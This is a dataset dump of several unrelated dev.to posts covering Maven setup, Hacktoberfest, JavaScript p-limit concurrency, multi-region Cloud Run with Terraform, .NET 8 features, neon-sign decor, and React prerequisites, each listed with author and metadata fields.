Now Apache Maven is in your hands:
```console
$ mvn --version
Maven home: /(...)/apache-maven-3.9.5
Java version: 21, vendor: Oracle Corporation, runtime: /(...)/jdk-21
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "6.1.0-13-amd64", arch: "amd64", family: "unix"
```
Let's create an example project named "maven-example-01" and run it:
```console
$ # create a project
$ mvn archetype:generate \
-DarchetypeArtifactId=maven-archetype-quickstart \
-DinteractiveMode=false \
-DgroupId=com.myexample.app \
-DartifactId=maven-example-01
$ # files are generated
$ cat src/main/java/com/myexample/app/App.java
package com.myexample.app;
/**
* Hello world!
*
*/
public class App
{
public static void main( String[] args )
{
System.out.println( "Hello World!" );
}
}
$ # build it
$ mvn package
$ # run
$ java -cp \
target/maven-example-01-1.0-SNAPSHOT.jar \
com.myexample.app.App
Hello World!
```
Yay 🙌
| nabbisen |
1,635,224 | My Hacktoberfest 2023 Experience | Intro I’m excited to share with you my experience of participating in this year's... | 24,880 | 2023-10-15T08:57:40 | https://dev.to/_eduard26/my-hacktoberfest-2023-experience-47b0 | hack23contributor, hacktoberfest23, opensource, github | ### Intro
I’m excited to share with you my experience of participating in this year's Hacktoberfest. In this post, I will talk about the highs and lows, the growth, and the benefits of contributing to open source projects during this month.
### Highs and Lows
One of the biggest highs for me was discovering and contributing to two amazing repositories: [illa-builder](https://github.com/illacloud/illa-builder) and [trello-clone](https://github.com/0l1v3rr/trello-clone).
ILLA is a robust open source low-code platform for developers to build internal tools. By using ILLA's library of Components and Actions, developers can save massive amounts of time on building tools. You can use natural language to define your agent's logic, personality, and behavior, and then deploy it as a web app, a chatbot, or a voice assistant. I was fascinated by this idea and decided to try it out for myself. I created a personalized recipe generator based on the user's culinary preferences using the ILLA AI builder. ([Github PR](https://github.com/illacloud/illa-builder/pull/2531)) I also created an app on this platform, a random RGBA color generator. ([Github PR](https://github.com/illacloud/illa-builder/pull/2838)) It was a fun and rewarding experience to see my AI agent come to life and suggest delicious dishes for me.
trello-clone is a web app that replicates the functionality of Trello, a popular project management tool. It uses Next.js 13, React, Tailwind CSS and Prisma. I learned a lot about these technologies while working on this project. I helped fix some bugs such as adding focus on inputs and fixing the WYSIWYG editor text overflow. ([Github PR1](https://github.com/0l1v3rr/trello-clone/pull/28), [Github PR2](https://github.com/0l1v3rr/trello-clone/pull/39))
Of course, not everything was smooth sailing. I also faced some challenges and difficulties during Hacktoberfest 2023. Some of them were:
- Finding suitable projects to contribute to. There are so many open source projects out there, but not all of them are beginner-friendly or well-documented. I had to do some research and filtering to find the ones that matched my interests and skills.
- Understanding the codebase and the workflow of the projects. Each project has its own structure, style, and conventions. It took me some time to get familiar with them and follow the guidelines. I also had to learn how to use Git and GitHub effectively to fork, clone, branch, commit, push, pull, and merge.
- Dealing with errors and bugs. Sometimes, things didn’t work as expected or broke down completely. I had to debug and test my code thoroughly before submitting a pull request. I also had to deal with merge conflicts and code reviews.
However, I didn’t give up or get discouraged by these problems. Instead, I used them as opportunities to learn and grow. I adapted by:
- Asking for help from the maintainers or other contributors when I was stuck or confused. They were very friendly and supportive and gave me useful feedback and guidance.
- Reading the documentation, tutorials, articles, blogs, videos, podcasts, etc. related to the projects or technologies I was working on. They helped me understand the concepts and best practices better.
- Practicing and experimenting with different solutions until I found the one that worked best for me.
### Growth
I can confidently say that my skillset improved significantly during Hacktoberfest 2023. After working on these projects, I learned:
- How to use illa-builder to create AI agents and apps without coding
- How to use Next.js 13 to create fast and scalable web apps
- How to use Prisma to store and manage data
- How to use Husky to format all the files from each commit automatically
I also learned some soft skills that are essential for any developer:
- How to communicate effectively with other developers
- How to better collaborate on open source projects
- How to write clear and concise code comments and documentation
- How to write good bug reports and pull requests
### Benefits
Participating in Hacktoberfest 2023 was not only a learning experience but also a rewarding one. Some of the benefits that I gained from it were:
- Contributing to open source projects that are useful and meaningful for me and others
- Connecting with other developers from different backgrounds and levels of expertise
- Earning some cool swag from Hacktoberfest organizers and sponsors
- Having fun and enjoying the process of creating and sharing | _eduard26 |
1,638,072 | hola | A post by tamij12 | 0 | 2023-10-18T02:39:03 | https://dev.to/tamij12/hola-4bkn | tamij12 | ||
1,639,039 | Serving Tasks Efficiently: Understanding P-Limit In Javascript | You are at a busy restaurant. There’s just so many tables available, and there’s a large queue of... | 0 | 2023-10-18T18:24:35 | https://dev.to/doziestar/serving-tasks-efficiently-understanding-p-limit-in-javascript-4m0m | javascript, concurrency, beginners, advanced | ---
title: Serving Tasks Efficiently: Understanding P-Limit In Javascript
published: true
date: 2023-10-18 17:30:35 UTC
tags: javascript,concurrency,beginner,advanced
canonical_url:
---

You are at a busy restaurant. There are only so many tables available, and there's a long queue of people waiting to be seated. The people are like the tasks in a JavaScript program, and the restaurant is the program itself.
Let’s imagine that this restaurant has a policy stating that a set number of people may be seated at once. Others must wait in queue until a seat becomes available. This is comparable to the operation of the JavaScript “p-limit” library. The number of promises (tasks) that can run concurrently is limited.
### Why would we need this?
When too many people are seated at once at a restaurant, the staff may feel overworked and the service may suffer. Similar to this, trying to run too many tasks at once in a programme might cause it to lag or even crash. This is particularly crucial for resource-intensive tasks like file system access and network request processing.
You can regulate the flow of tasks to guarantee that only a predetermined number can run concurrently by using p-limit. By doing this, you can guarantee that your programme will always be responsive and effective.
### How does it work?
Imagine the restaurant has a special gatekeeper. The gatekeeper knows how many tables are available and only lets a limited number of people in at once; when one group leaves, the next group is let in.
In p-limit, this gatekeeper is the limit function returned by `pLimit(n)`, which caps how many promises (tasks) can execute concurrently.
### Let’s see some code!
First, you need to install the p-limit library:
```
yarn add p-limit
```
Next, let’s write some code:
```
const pLimit = require('p-limit');
// This creates a gatekeeper that only allows 2 promises to run at once
const limit = pLimit(2);
const cookDish = async (dishName) => {
// Simulating a time-consuming task
await new Promise(resolve => setTimeout(resolve, 1000));
console.log(`${dishName} is ready!`);
};
// Create an array of dishes to be cooked
const dishes = ['Pizza', 'Burger', 'Pasta', 'Salad', 'Ice Cream'];
// This is like the customers waiting in line
const tasks = dishes.map(dish => {
return limit(() => cookDish(dish));
});
// Execute all tasks
Promise.all(tasks).then(() => {
console.log('All dishes are served!');
});
```
Even though we have five dishes, only two will be cooked at the same time due to our limit. So, you'll see:
```
Pizza is ready!
Burger is ready!
Pasta is ready!
... and so on.
```
But remember, only two dishes are being cooked simultaneously!
### Hubbub YouTube Fetcher
Now let’s look at an example from Hubbub, which helps to further understand it.
A feature at Hubbub retrieves data from a YouTube channel, including the various video shelves (categories of videos) and the videos contained in those shelves.
But you can’t just send a tonne of queries to YouTube’s servers in a short amount of time because they have rate constraints. They will temporarily block you if you do. This is the sweet spot for “p-limit”.
Here’s how we use it at Hubbub:
```
const pLimit = require('p-limit');
const limit = pLimit(5);
async getYoutubeChannelItemList(channelId) {
try {
console.log('channelId', channelId);
const response = await youtube.getChannel(channelId);
const allShelfItems = [];
for (const shelf of response.shelves) {
const shelfItemsPromises = shelf.items.map(item => {
// This is the crucial part. For each item in the shelf, we limit how many can be processed simultaneously.
return limit(() => this.createItemFromVideo(item, response, channelId, 'youtubeChannels'));
});
// Wait for all the video items in this shelf to be processed
const shelfItems = await Promise.all(shelfItemsPromises);
allShelfItems.push(...shelfItems);
}
return allShelfItems;
} catch (error) {
Sentry.captureException(error); // Reporting the error to an error tracking platform
throw new HttpException(INTERNAL_SERVER_ERROR, error.message); // Handle the error gracefully
}
}
```
### Breaking it Down
1. Set Up the Limit: `pLimit(5)` means at any given time, a maximum of 5 promises (tasks) are running concurrently. Think of it as only allowing 5 YouTube video fetch requests at the same time.
2. Fetch the Channel: `youtube.getChannel(channelId)` fetches the YouTube channel's details, including its shelves.
3. Process Each Shelf: For each shelf in the channel, we want to process the video items. But instead of processing all items at once and risking a rate limit violation, each call is wrapped with our limit: `return limit(() => this.createItemFromVideo(item, response, channelId, 'youtubeChannels'));`. Here, `createItemFromVideo` is called for every item, but only 5 of those calls run at the same time.
4. Wait for Completion: `await Promise.all(shelfItemsPromises)` ensures that the code waits until all video items in the current shelf are processed before moving on to the next shelf.
By using p-limit, we make sure we collect YouTube channel details quickly without going over YouTube's rate constraints. It's a great illustration of how to effectively handle several asynchronous processes. A well-designed program handles its tasks optimally, just as a restaurant offers excellent service by managing its patrons! | doziestar |
1,671,155 | Hi! I'm new here.. | I’m Ryan VerWey, a mid-level developer with a burgeoning passion in the fields of web development and... | 0 | 2023-11-19T04:12:57 | https://dev.to/rverwey/hi-im-new-here-2069 | webdev, powerplatform, newdev, beginners | I’m Ryan VerWey, a mid-level developer with a burgeoning passion in the fields of web development and UI/UX design. With my roots firmly planted in SharePoint and Microsoft Power Platform, I've decided to venture into the dynamic world of web development and the creative realm of UI/UX design.
My journey into this new domain is not just a career shift, but a quest to deepen my understanding and skills in a rapidly evolving digital landscape. Through this blog, I aim to share my experiences, challenges, and the valuable lessons learned along the way.
I believe that growth comes from stepping out of our comfort zones. This transition marks a significant leap for me, from a specialized focus to a broader and more inclusive perspective in technology. My goal is to not only enhance my technical capabilities but also to develop a keen eye for design and user experience.
Stay tuned as I navigate through this exciting phase of my career, where every day is a learning opportunity. I look forward to connecting with fellow enthusiasts, exchanging ideas, and growing together in this journey.
 | rverwey |
1,639,713 | A minimal setup for a high availability service using Cloud Run | In this blog post, I will explain what is needed to set up a web service that runs in multiple GCP... | 0 | 2023-10-19T11:58:31 | https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/ | cloud, googlecloudplatform, terraform | ---
title: A minimal setup for a high availability service using Cloud Run
published: true
date: 2022-01-11 14:16:13 UTC
tags: Cloud,GoogleCloudPlatform,Terraform
canonical_url: https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/
---
In this blog post, I will explain what is needed to set up a web service that runs in multiple GCP regions.
The main reasons to deploy your service in more than one region are:
- Handle single-region failures so that your application is highly available.
- Route traffic to the nearest region so your users experience faster loading times.
## Create Cloud Run deployments
A Cloud Run service only lives in a single region, so for a multi-region setup we will need to deploy the same container in multiple regions.
Luckily using a Terraform `for_each` loop, this does not add too much additional configuration:
```
locals {
locations = ["europe-west4", "europe-west1"]
}
resource "google_cloud_run_service" "service" {
for_each = toset(local.locations)
name = "service-${each.key}"
location = each.key
...
}
```
I recommend using the name of the region in the name of the Cloud Run service so you can easily find them and guarantee uniqueness.
> We use `local.locations` to define the regions we want to deploy in so we can re-use that configuration in other resources.
## Set up load balancing ingress
By default, Cloud Run gives a service a publicly available `.run.app` URL.
However this points to a single Cloud Run service, and for a multi-region set we will need multiple services.
To do this, we will need to create a Global Load Balancer that uses [Serverless Network Endpoint Groups](https://cloud.google.com/load-balancing/docs/negs/serverless-neg-concepts) (NEGs) as backend.
These NEGs then route the traffic to the Cloud Run instances.
Let’s set up the needed resource for our ingress stack:
```
resource "google_compute_global_address" "ip" {
name = "service-ip"
}
resource "google_compute_region_network_endpoint_group" "neg" {
for_each = toset(local.locations)
name = "neg-${each.key}"
network_endpoint_type = "SERVERLESS"
region = each.key
cloud_run {
service = google_cloud_run_service.service[each.key].name
}
}
resource "google_compute_backend_service" "backend" {
name = "backend"
protocol = "HTTP"
dynamic "backend" {
for_each = toset(local.locations)
content {
group = google_compute_region_network_endpoint_group.neg[backend.key].id
}
}
}
resource "google_compute_url_map" "url_map" {
name = "url-map"
default_service = google_compute_backend_service.backend.id
}
resource "google_compute_target_http_proxy" "http_proxy" {
name = "http-proxy"
url_map = google_compute_url_map.url_map.id
}
resource "google_compute_global_forwarding_rule" "frontend" {
name = "frontend"
target = google_compute_target_http_proxy.http_proxy.id
port_range = "80"
ip_address = google_compute_global_address.ip.address
}
```
> Notice how we are re-using `local.locations` to create the regional resources.

No one can call our service yet though, because we need to tell GCP that this is a public service that can be invoked by everyone:
```
data "google_iam_policy" "noauth" {
binding {
role = "roles/run.invoker"
members = ["allUsers"]
}
}
resource "google_cloud_run_service_iam_policy" "noauth" {
for_each = toset(local.locations)
service = google_cloud_run_service.service[each.key].name
location = google_cloud_run_service.service[each.key].location
policy_data = data.google_iam_policy.noauth.policy_data
}
```
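If you later want HTTPS on the same IP, the pattern extends naturally with a managed certificate and an HTTPS proxy. This is a sketch; the domain is a placeholder you would replace with your own:

```
resource "google_compute_managed_ssl_certificate" "cert" {
  name = "cert"

  managed {
    domains = ["example.com"]
  }
}

resource "google_compute_target_https_proxy" "https_proxy" {
  name             = "https-proxy"
  url_map          = google_compute_url_map.url_map.id
  ssl_certificates = [google_compute_managed_ssl_certificate.cert.id]
}

resource "google_compute_global_forwarding_rule" "https_frontend" {
  name       = "https-frontend"
  target     = google_compute_target_https_proxy.https_proxy.id
  port_range = "443"
  ip_address = google_compute_global_address.ip.address
}
```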
## Deploy and call the service
Let’s add an output for the static IP address so we know what to call after deployment:
```
output "static_ip" {
value = google_compute_global_address.ip.address
}
```
Now run `terraform apply` to deploy everything and validate that it returns the “Hello World” container (for example using `curl $(terraform output --raw static_ip)`).
The Google Cloud Console also gives a nice visual overview of how the requests are routed:

Now you know how to deploy Google Cloud Run services in multiple regions. Give it a try with [PrivateBin](https://xebia.com/blog/how-to-deploy-privatebin-on-google-cloud-run-and-google-cloud-storage/)!
## Bonus: enable Cloud CDN for even faster loading times
To prevent static assets from being served from your container, you can enable Cloud CDN to automatically serve these from Google's edge caches instead of the container itself.
Cloud CDN will automatically detect which routes are static resources, but you can manually override this configuration as well.
Simply add the `enable_cnd` flag to the backend service resource:
```
resource "google_compute_backend_service" "backend" {
name = "backend"
protocol = "HTTP"
enable_cdn = true
...
}
```
## Conclusion
By default, a single Cloud Run service can only be deployed in one region.
By using a global load balancer, we can deploy a Cloud Run service in multiple regions to bring high availability and low latency.
The `for_each` loop feature of Terraform makes this very easy to set up.
The post [A minimal setup for a high availability service using Cloud Run](https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/) appeared first on [Xebia](https://xebia.com). | christerbeke |
1,640,646 | What's new in .NET 8? - New Features Unveiled | DOT NET is a prominent platform for custom software development chosen mostly by large-scale IT... | 0 | 2023-10-20T08:19:34 | https://www.ifourtechnolab.com/blog/what-s-new-in-net-8-new-features-unveiled | dotnet, webdev, programming, tutorial | DOT NET is a prominent platform for [custom software development](https://www.ifourtechnolab.com/custom-software-development-company) chosen mostly by large-scale IT giants. According to statistics, there are more than 307,590 developers working in the United States, and the number is growing every day. These figures effectively shed light on the .NET framework's excellent future possibilities.
Microsoft has launched various versions, the finest of which is .NET Core. It includes various improvements over earlier versions; for details, see the [major distinctions between .NET MVC and .NET Core](https://www.ifourtechnolab.com/blog/differences-between-asp-net-and-asp-net-core-asp-net-vs-asp-net-core).
DOTNET 8 is the latest version released in November 2023. It has been designated as an LTS version and will continue to receive community support and bug fixes for at least three years. This blog will delve into the new features and improvements in .NET 8.
However, it's important to note that performance improvements in .NET 8 are not limited to the areas mentioned here. The .NET team is continuously optimizing frameworks, tools, and runtime performance, ensuring that developers can build scalable applications across multiple platforms.
#### Unleash your business potential with [Angular development solutions](https://www.ifourtechnolab.com/angular-js-development-company).
## What are the performance improvements introduced in .NET 8?
In .NET 8, several performance improvements have been introduced that enhance application responsiveness and speed, to provide seamless user experience. Here's a look at some of the new features in .NET 8.
- Enhanced route constraints offer improved performance.
- New API development analyzers handle synchronization exceptions in Blazor.
- Context hot reload in Web Assembly enables support for .NET instance fields, properties, and events.
- Symbol servers now support .NET Web Assembly debugging.
- Blazor Firefox experimental Webcil format facilitates debugging of .NET assemblies and Web Assembly.
- Specify the initial Blazor WebView URL for loading.
- A new option keeps the SPA development server running during development.
- Kestrel now supports named pipes.
- gRPC adds support for HTTP/2 over TLS (HTTPS) on macOS, HTTP/3 is enabled by default, and JSON transcoding no longer requires the `annotations.proto` and `http.proto` files.
- Use `HubConnectionBuilder` to specify the server timeout and keep-alive interval parameters, alongside new `IPNetwork` parsing support.
- Configuration support was added for parsing the `HTTP_PORTS` and `HTTPS_PORTS` settings.
- Warnings are emitted when specified HTTP protocols will not be used.
These improvements aim to optimize various aspects of the .NET ecosystem, allowing applications to perform better and deliver a smoother user experience.
#### Read More: [4 Proven tactics to hire .NET developers for your Business startup](https://www.ifourtechnolab.com/blog/4-proven-tactics-to-hire-net-developers-for-your-business-startup)

## New features of .NET 8
.NET 8 brings new capabilities that not only boost website performance but also responsiveness in order to provide visitors with a more seamless user experience.
Let's explore some of the key performance enhancements in .NET 8:
### 1. JIT Compiler Enhancements
The JIT (Just-in-Time) compiler now generates better machine code, improving runtime execution. This helps reduce overhead and improves the runtime performance and responsiveness of the application.
### 2. Garbage Collection Improvements
The garbage collector, which manages memory allocation and deallocation, has undergone enhancements in .NET 8. These improvements bring:
- Reduced memory fragmentation
- Optimized garbage collection algorithms
- Better memory utilization
- Overall performance
### 3. Hardware Intrinsic Support
.NET 8 introduces enhanced support for hardware intrinsics, which are low-level instructions that can directly utilize specific processor features.
By leveraging hardware intrinsics, developers can write high-performance code that takes advantage of specialized CPU instructions, resulting in significant performance gains for compute-intensive operations.
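For example, the SIMD-friendly `System.Numerics.Vector<T>` type lets one instruction process several values at once where the hardware supports it. This is a generic sketch of the idea, not a .NET 8-only API:

```csharp
using System.Numerics;

public static class SimdDemo
{
    // Adds two float arrays, using SIMD lanes where the hardware supports it.
    public static void Add(float[] a, float[] b, float[] result)
    {
        int i = 0;
        int width = Vector<float>.Count; // number of lanes per vector on this CPU

        for (; i <= a.Length - width; i += width)
        {
            var va = new Vector<float>(a, i);
            var vb = new Vector<float>(b, i);
            (va + vb).CopyTo(result, i);
        }

        for (; i < a.Length; i++) // scalar tail for leftover elements
        {
            result[i] = a[i] + b[i];
        }
    }
}
```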
#### Looking to [hire .NET developer](https://www.ifourtechnolab.com/hire-dot-net-developer) for your project?
### 4. Async Improvements
Asynchronous programming has seen significant advancements with the release of .NET 8. As a core aspect of modern app development, the async/await pattern significantly improves an application's speed and responsiveness.

### 5. Improved Caching Mechanisms
The `MemoryCache` class, which enables fast in-memory caching for frequently requested data, is one of the caching mechanisms improved in .NET 8. These caching enhancements can reduce data retrieval and processing overhead dramatically, resulting in enhanced application performance.
### 6. Support for cloud-native applications
Support for cloud-native integration through modern technologies is an important addition to .NET 8. It enables developers to create scalable software that takes full advantage of cloud technology:
- Containerization support
- Serverless computing
- Kubernetes integration
- Cloud storage and messaging integration
- Distributed tracing and monitoring
- Cloud-native tooling
- Infrastructure as Code (IaC) integration
#### Read More: [Best Practices to hire Java developers for Business software development](https://www.ifourtechnolab.com/blog/best-practices-to-hire-java-developers-for-business-software-development)
### 7. Performance Profiling and Diagnostic Tools
.NET 8 provides improved performance profiling and diagnostic tools, empowering developers to identify and resolve performance bottlenecks more effectively. These tools offer insights into application behavior, resource consumption, and execution paths, enabling developers to optimize critical sections of their code and improve overall performance.
The entire process of upgrading to .NET 8 was made easier with the help of new tooling. Look at the following image, which depicts the migration stages for .NET 8.

So, leveraging all of these performance improvements in .NET 8, developers can create applications that are more responsive, utilize system resources more efficiently, and provide a smoother user experience, ultimately benefiting both the end users and the organizations that rely on these applications.
### Routing infrastructure improvements in .NET 8
In .NET 8, the routing capabilities have been further improved, empowering developers to build robust and efficient web applications. The enhancements in the routing infrastructure of .NET 8 bring benefits not only to developers but also to end-users, ensuring smooth navigation and accessibility.
### Enhanced Routing Performance
In .NET 8, the routing infrastructure has undergone optimizations to improve routing performance. These optimizations help ensure that requests are processed swiftly, enabling web applications to handle a larger volume of traffic efficiently. This improvement is crucial in humanitarian scenarios where timely access to critical resources and information is of utmost importance.
### Localization and Internationalization Support
.NET 8 offers enhanced support for localization and internationalization in routing. This means that developers can easily define routes specific to different languages or regions, allowing applications to adapt to the cultural and linguistic preferences of users. In humanitarian scenarios, where applications often serve a diverse user base, localization support helps bridge language barriers and ensures that crucial information reaches individuals in their preferred language.
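For instance, a culture prefix can be expressed directly in a route template. This is a hypothetical sketch using ASP.NET Core minimal APIs; the route and message are made up:

```csharp
var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();

// Matches /en/help, /fr/help, and so on; the constraint keeps the segment at least 2 characters.
app.MapGet("/{culture:minlength(2)}/help", (string culture) =>
    Results.Ok($"Help content localized for '{culture}'"));

app.Run();
```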
### Flexible Routing Configuration
.NET 8 offers more flexibility in configuring routes, making it easier for developers to define and manage complex routing scenarios. This flexibility allows humanitarian organizations to build applications that cater to various user needs, including different languages, regions, or specific user roles. With improved routing configuration, developers can create personalized experiences and provide targeted information to different user segments.
### Secure Routing Infrastructure
Security is a paramount concern in any application, especially when dealing with sensitive humanitarian data. In .NET 8, the routing infrastructure has been fortified with enhanced security features to protect against common web vulnerabilities, such as cross-site scripting (XSS) and cross-site request forgery (CSRF). These security improvements help safeguard critical data, ensuring the privacy and integrity of humanitarian information.
#### Read More: [Leverage the power of .NET security in Hospitality business software](https://www.ifourtechnolab.com/blog/leverage-the-power-of-net-security-in-hospitality-business-software)
### Route Resilience and Fault Tolerance
The routing infrastructure in .NET 8 has been strengthened to handle fault tolerance and resilience. In humanitarian contexts, where the availability of services and information is vital, these improvements ensure that applications can recover gracefully from failures or unexpected disruptions. With enhanced resilience, organizations can maintain critical services and deliver uninterrupted support to individuals in need.
Using these .NET 8 routing enhancements, you can design apps that are more responsive, resulting in a better user experience.
## Conclusion
With remarkable changes, the arrival of DOT NET 8 has brought about a significant transformation in web development. We reviewed the [major features of .NET](https://www.ifourtechnolab.com/blog/brief-introduction-of-net-5-for-asp-net-developers) 8 in this blog, but it is essential to remember that performance gains in DOTNET 8 are not restricted to the areas described above. The .NET team is constantly optimizing the runtime, frameworks, and tools to ensure that developers can design high-performance applications in a variety of circumstances.
| ifourtechnolab |
1,643,980 | 15 Reasons to Use Custom Neon Signs to Decorate Your Gaming Room | Setting up equipment is only one aspect of designing the optimal gaming space; you also need to... | 0 | 2023-10-23T19:01:57 | https://dev.to/hammadtanveer100/15-reasons-to-use-custom-neon-signs-to-decorate-your-gaming-room-4jnb | Setting up equipment is only one aspect of designing the optimal gaming space; you also need to create an environment that captures your enthusiasm for gaming. In this endeavor, Custom Neon Signs have come to light as an eye-catching method of transforming your gaming room into a world of excitement and individuality. These brilliant pieces of art present a singular chance to give your gaming setup personality and allure.
It's worth the effort to turn your gaming room from a boring room into an exciting world. A captivating way to add your personality, enthusiasm, and sense of design to your gaming setup is with Custom Neon Signs. Custom Neon Signs provide limitless opportunities to make your gaming space genuinely distinctive, whether you're showcasing your gaming identity, including ambient lighting, or adding interactive aspects. So, when you start your creative project, think about the allure of Custom Neon Signs and observe how they fill your gaming area with a dazzling glow that reflects your excitement for gaming.
In this post, we'll explore original ways to use [Custom Neon Signs](https://www.kingsignsmiami.com/) as decorations in your gaming area to make it a genuinely one-of-a-kind haven.

## 1. Gamer's Paradise Entrance:
Make a spectacular entrance rather than merely entering. With Custom Neon Signs placed next to the doorway, you can warmly welcome guests and yourself into your gaming haven. This first impression sets the tone for the entire space, whether it's a straightforward "Welcome to the Gaming Zone" or a quote from your favorite game.
## 2. Showcase Your Gaming Identity:
Customization is important. Create Custom Neon Signs that represent your gaming persona. It might be a representation of one of your favorite games, a badge representing your skill at gaming, or even your glowing gamer tag. This not only gives it a more personalized touch, but it also honors your individual gaming journey.
## 3. Customized Game Corner:
Customization is important. Create Custom Neon Signs that represent your gaming persona. It might be a representation of one of your favorite games, a badge representing your skill at gaming, or even your glowing gamer tag. This not only gives it a more personalized touch, but it also honors your individual gaming journey.
## 4. Highlight Gaming Consoles:
Give the attention that your game consoles require. Custom Neon Signs should be placed precisely above your consoles to produce an eye-catching focal point. The illumination enhances your gaming setup's style while also drawing attention to it.
## 5. Glowing Wall Art:
Add a little artistic flair to improve the beauty of your space. Hang personalized neon signs on the wall to turn it into a glowing work of art. The interaction of light and color provides a captivating aspect that improves the ambiance of your gaming area overall.
## 6. Accentuate Themes:
Accept your preferred video game themes. Design Custom Neon Signs that fit these themes if you enjoy classic arcade games or magical fantasy settings. You may enhance the thematic appeal of your gaming room by including this signage in your design.
## 7. Add Ambient Lighting:
For prolonged gaming sessions, appropriate illumination is essential. The ideal quantity of ambient illumination is provided by custom neon signage, which fosters a welcoming ambiance. The gentle illumination lessens eye fatigue and improves your entire game experience.
## 8. Behind-the-Screen Glow:
Installing Custom Neon Signs behind your TV or gaming monitor will improve your visual experience. The soft glow not only gives a touch of visual appeal but also develops a rich atmosphere that enhances your gaming experience.
## 9. Interactive Wall:
Add an interactive component to your gaming space. Choose a Custom Neon Sign with dynamic colour or pattern changes. Your gaming setup is made even more exciting and engaging by this interactive element.
## 10. Nameplate for Gear:
Improve the look of your gaming accessories. Make personalized neon signs to use as nameplates for your headset, mouse, keyboard, and other devices. This useful yet fashionable accessory gives your system a distinctive flair.
## 11. Streamer's Dream:
A Custom Neon Sign with your streaming name or logo can act as a standout backdrop for individuals who enjoy game streaming. It not only improves your streaming atmosphere, but it also helps your audience recognize your setup right away.
## 12. Gamer's Motivation:
Encouragement quotes can help you play better. Include Custom Neon Signs with messages that inspire you during intense gaming sessions. These reminders help you stay motivated and committed to overcoming obstacles.
## 13. Ceiling Art:
Be imaginative in how you arrange your decor. Hang personalized neon signs from the ceiling to give the impression that they are floating. Your gaming room gains dimension and a dash of fun from its odd placement.
## 14. Create a Contrast:
Try out different visual contrasts. A Custom Neon Sign provides a stunning contrast that not only sticks out but also improves the overall aesthetic of the space if your game room has dark walls.
## 15. Gaming Wall Collage:
Combine several Custom Neon Signs to create a stunning gaming wall collage. Each symbol can reflect many facets of your gaming experience, resulting in a display that is both meaningful and gorgeous to look at.
The addition of Custom Neon Signs to your gaming area is a game-changing decision that comes with a wealth of enticing benefits. These radiant installations go beyond simple aesthetics, acting as catalysts for an enhanced gaming experience, as demonstrated by the 15 reasons listed. Custom Neon Signs have a charm that goes beyond their aesthetic appeal. They not only add vibrant colors and shapes, but they also serve as a blank canvas on which you can paint your individual preferences and interests. Because of its adaptability, you can display your favorite video games, characters, or phrases, effectively transforming your gaming area into an expression of your personality.
| hammadtanveer100 | |
1,644,835 | Game "Black_Jack" in Python | The game "Black_Jack" is one of the game projects in the "Codecademy" course "Computer Science". I... | 0 | 2023-10-24T15:07:20 | https://dev.to/nikola71/game-blackjack-in-python-4o20 | The game "Black_Jack" is one of the game projects in the "Codecademy" course "Computer Science". I published that game project on my GitHub account: https://github.com/NikolaPopovic71. | nikola71 | |
1,658,014 | JavaScript topics for learning react | Learning React in 2023 requires a solid understanding of various JavaScript concepts, as React is a... | 0 | 2023-11-06T07:23:51 | https://dev.to/rowsanali/javascript-topics-for-learning-react-2ao6 | webdev, javascript, react, beginners | Learning React in 2023 requires a solid understanding of various JavaScript concepts, as React is a JavaScript framework for building user interfaces. Here are some of the essential JavaScript topics you should be comfortable with before diving into React:
[Follow me on X](https://bit.ly/3SinH8E)
1. **Callback Functions**: These are functions executed after another function has completed. They're prevalent in JavaScript for handling asynchronous operations, such as events, timers, and after fetching data.
2. **Promises**: To avoid "Callback Hell," which is the nesting of callback functions, promises are used. They allow for writing asynchronous code in a more manageable way and are essential for operations where you expect a future value, such as HTTP requests.
3. **Array Methods**: Understanding methods like `map()`, `filter()`, and `find()` is crucial. `map()` is particularly important in React for rendering lists of elements and can return a new array without altering the size of the original array.
4. **Destructuring**: This is a concise way to extract multiple properties from arrays or objects by unpacking them into distinct variables, which is frequently used in React for props and state management.
5. **Rest and Spread Operators**: These are versatile operators denoted by `...` and are used for several purposes like combining arrays, objects, or extracting their values.
6. **ES2015 Features**: Since React builds on modern JavaScript features introduced with ES2015 (also known as ES6), familiarity with these syntaxes and capabilities is imperative. A few of them appear in the quick sketch after this list.
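Here's a quick sketch tying several of these together (the data is made up):

```javascript
const users = [
  { id: 1, name: "Ada", active: true },
  { id: 2, name: "Linus", active: false },
];

// map(): build a new array of names without mutating `users`
const names = users.map((user) => user.name);

// filter() and find(): select a subset or a single match
const activeUsers = users.filter((user) => user.active);
const linus = users.find((user) => user.name === "Linus");

// Destructuring: unpack properties into variables
const { id, name } = users[0];

// Spread: copy an array and append without mutating the original
const moreUsers = [...users, { id: 3, name: "Grace", active: true }];

console.log(names, activeUsers, linus, id, name, moreUsers.length);
```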
Each of these JavaScript concepts is a foundational block for learning React effectively and will help you understand the more advanced features of the framework as you progress. Moreover, diving into React with a strong grasp of JavaScript will make the learning curve much smoother and enable you to write more robust, maintainable, and efficient code. | rowsanali |
1,658,198 | GPT-4 Vs Zephyr 7b Beta: Which One Should You Use? 2023 | "Zephyr 7B beta" is a fine-tuned version of the model "Mistral" developed by the Hugging Face H4 team... | 0 | 2023-11-06T11:03:22 | https://dev.to/tarikkaoutar/gpt-4-vs-zephyr-7b-beta-which-one-should-you-use-2023-4n7c | gpt4, langchain, llamaindex, datascience | "Zephyr 7B beta" is a fine-tuned version of the model "Mistral" developed by the Hugging Face H4 team. It performs similarly to the earlier Chat Llama 70B model on multiple benchmark tests, achieves even better results on "MT-Bench", and is more accurate than Meta's Llama 2.
Full Article on My [HomePage](https://quickaitutorial.com/gpt-4-vs-zephyr-7b-beta-which-one-should-you-use/) | tarikkaoutar |
